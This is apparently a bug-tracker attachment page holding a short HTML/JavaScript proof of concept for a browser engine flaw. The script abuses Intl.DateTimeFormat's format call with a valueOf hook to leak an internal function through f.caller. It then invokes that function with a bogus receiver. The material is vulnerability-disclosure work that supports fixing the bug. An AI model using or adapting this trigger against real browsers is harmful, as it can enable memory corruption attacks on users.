New issue
Advanced search Search tips

Issue 1036 attachment: datetimeformat.html (346 bytes)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<html><body><script>

var date = new Date(Date.UTC(2012, 11, 20, 3, 0, 0));


var i = new Intl.DateTimeFormat();

//print(i);


var q;

function f(){

//print("in f");
//print(f.caller);
q = f.caller;
return 10;


}


try{
i.format({valueOf : f});
}catch(e){

//print("problem");

}

//print(q);
q.call(0x77777777);

</script></body></html>